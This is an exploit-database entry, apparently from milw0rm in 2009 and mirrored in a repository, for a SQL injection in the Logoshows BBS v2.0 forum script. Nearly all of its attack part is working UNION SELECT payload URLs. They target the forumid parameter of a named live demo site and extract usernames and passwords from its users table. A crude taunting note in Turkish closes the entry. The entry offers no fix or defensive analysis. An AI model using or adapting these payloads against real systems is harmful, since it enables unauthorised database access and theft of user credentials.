exploit-db-mirror/platforms/php/webapps/9389.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

48 lines
1.2 KiB
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

__________________________________________________________________________________________________________________________
# Author : Ruzgarin_Oglu
# Script Name : Logoshows BBS v2.0
# Script Download : http://www.logoshows.com/download/bbs88.rar
# Vulnerable Type : Sql Injection
# Demo : http://www.logoshows.com/bbs/
# Licence And Pricing : $1.00 USD
# Special Thanks : By.Ultr@si(Student lol),Fortyseven,Rawage,Daniel-Koo,Subz3rr0,By.Seyfi,Fero,Septemb0x, ve ismini sayamadığım diğer dostlarım...
___________________________________________________________________________________________________________________________________
Exploit:
/globepersonnel_forum.asp?forumid=[SQL]
POC:
http://www.victim.com/[path]/globepersonnel_forum.asp?forumid=[SQL]
Example
Username:
http://www.logoshows.com/bbs/globepersonnel_forum.asp?forumid=1+union+select+0,1,2,3,4,5,6,7,8,9,10,username,12,13,14,15,16,17,18,19+from+users
Password:
http://www.logoshows.com/bbs/globepersonnel_forum.asp?forumid=1+union+select+0,1,2,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19+from+users
----Note----
Herkesin bir s*k*lme zamanı vardır...
Bekleyin beni!
----Note----
# milw0rm.com [2009-08-07]